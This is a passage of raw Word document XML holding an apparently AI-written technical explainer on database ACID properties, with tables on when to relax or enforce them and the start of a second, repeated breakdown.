        <w:t xml:space="preserve">  - Group commit (batched fsync): 10x improvement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BD0CEE" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Async durability: 100x improvement (but data loss risk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A5E3BF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1EF5B2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Combined: 100K+ TPS achievable with acceptable tradeoffs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC4894D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 When to Relax ACID</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355"/>
        <w:gridCol w:w="3545"/>
        <w:gridCol w:w="3450"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w14:paraId="150006E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D42E6F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Scenario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061B8A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>What to Relax</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5B2DFD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w14:paraId="39875FB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14692F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Analytics/reporting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14178D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Isolation (Read Committed or read from replica)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D85024" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Exact consistency not needed for dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w14:paraId="3028BC3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6F4214" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Logging/metrics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46A9E5" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Durability (async write, no fsync)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F08B9D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Re-derivable data, loss of seconds acceptable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w14:paraId="7CB5C0E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C9239C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Session storage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67CFCB" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Durability (in-memory or async)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9B7A76" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Sessions can be recreated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w14:paraId="39561C5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B74FE9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Caching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819BC1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>All (Redis is not ACID)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40E320" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Cache is a copy, source of truth elsewhere</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w14:paraId="7A33BE1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891329" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Social feeds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B0ED87" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Consistency (eventual)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952185" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Seeing a post 2 seconds late is acceptable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E112D5C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 When ACID Is Non-Negotiable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6405FF8E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5529E252" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t>✓ Financial transactions (money transfer, payment processing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DC47AB" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>✓ Inventory management (stock counts at checkout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B649D5" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>✓ Booking systems (seat reservation, hotel rooms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473B3AA2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>✓ User authentication (credential updates, password changes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464532EA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>✓ Access control (permission grants/revocations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BF2195" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>✓ Order placement (the moment of purchase)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A784485" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>✓ Billing/invoicing (amounts, charges, credits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E971AA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>✓ Compliance-critical data (audit logs, regulatory records)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BA6E4F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:pict w14:anchorId="56F19CF9">
          <v:rect id="_x0000_i6704" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B26A795" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F80BFF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF0FBB3" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>┌────────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F4AF22" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│                         ACID PROPERTIES                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF9288" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│                                                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D52373" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│  ATOMICITY:   "All or nothing"                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BDEDE2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│    Mechanism: WAL + undo log                                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5BE1B9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│    Guarantee: Crash mid-transaction → fully rolled back             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEF6240" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│                                                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70992E9A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│  CONSISTENCY: "Valid state → valid state"                            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9DC5CD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│    Mechanism: Constraints + triggers + application logic             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BA2D0E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│    Guarantee: Invariants always hold after each transaction          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5F34EC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│                                                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7E1C78" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│  ISOLATION:   "Transactions don't interfere"                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77172685" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│    Mechanism: MVCC (snapshots) or 2PL (locks) or SSI (detect+abort)│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2DB121" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│    Guarantee: Result equivalent to some serial execution            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F11FB8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│    Tradeoff:  Weaker isolation = higher performance                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425AC2CA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t>│                                                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEF9D45" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│  DURABILITY:  "Committed = permanent"                               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39712A65" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│    Mechanism: WAL fsync to persistent storage                       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457445B9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│    Guarantee: Survives crash, power loss, hardware failure          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A3ACAA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│    Tradeoff:  Stronger durability = higher write latency            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A23C328" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│                                                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2902C7B9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│  Together they ensure: your database never lies, never loses data,  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB4D726" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>│  never shows contradictory state, and never corrupts itself.        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AECFEE" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>└────────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6BB25A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA61F2F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>ACID properties are the contract between a database and its users: atomicity guarantees that failures are invisible (all or nothing); consistency guarantees that rules are never broken; isolation guarantees that concurrency is invisible (transactions appear serial); and durability guarantees that success is permanent (committed data survives any crash). The art of system design is choosing WHERE to enforce full ACID (critical paths — money, inventory, identity) and where to relax it (non-critical paths — analytics, caching, social) to balance correctness against performance and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7570FEFB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Copilot said: # ACID Properties — Deep Technical Breakdown --- ##</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF2DAFF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ACID Properties — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C82D33" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:pict w14:anchorId="2F4315E1">
          <v:rect id="_x0000_i6769" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="177AB8B9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What ACID Actually Is (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0D57B7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>ACID is not simply "four properties databases have." That description mistakes a checklist for a guarantee. ACID is the </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>formal specification of what a database transaction system must guarantee about the behavior of concurrent operations on shared, persistent data — where the guarantees are defined precisely enough to enable correct application logic even in the presence of concurrent access by thousands of clients, hardware failures at arbitrary moments, and software bugs in the database engine itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEADE66" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>The engineering problem ACID solves is fundamental: </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">applications need to reason about data as if they have exclusive access to a consistent system, but the reality is shared </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>access, partial failures, and non-deterministic timing.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t> Without ACID, application developers must implement consistency mechanisms themselves — tracking which operations need to be atomic, managing concurrency control, handling partial failures, and ensuring data survives crashes. This is extraordinarily complex, error-prone, and essentially rebuilds the database engine in application code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6962BD81" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>ACID emerged from the recognition that certain properties — if guaranteed by the database engine — enable applications to treat the database as a reliable, consistent abstraction regardless of the chaos happening underneath. Jim Gray and Andreas Reuter formalized these properties in the 1970s-1980s, and they have defined the contract of relational databases ever since.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0CDE86" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The four properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C17A4B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Atomicity</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t> — A transaction's operations are indivisible: either all succeed or none do. There is no partial transaction visible to the rest of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7D7140" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t> — A transaction takes the database from one valid state to another valid state, preserving all defined integrity constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E9492" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t> — Concurrent transactions execute as if they were serial — no transaction sees the intermediate state of another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D46634E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Durability</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t> — Once a transaction commits, its effects survive any subsequent failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005C7F02" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Each property sounds simple. Each is, in reality, a deep engineering problem requiring sophisticated implementation mechanisms — and understanding those mechanisms reveals why database design is one of the hardest problems in systems engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77811C45" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:pict w14:anchorId="3BAB27A3">
          <v:rect id="_x0000_i6770" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F266F87" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Atomicity — The All-or-Nothing Guarantee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7091603D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Atomicity Really Means</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1425E7F8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Atomicity addresses a fundamental reality: </w:t>
      </w:r>
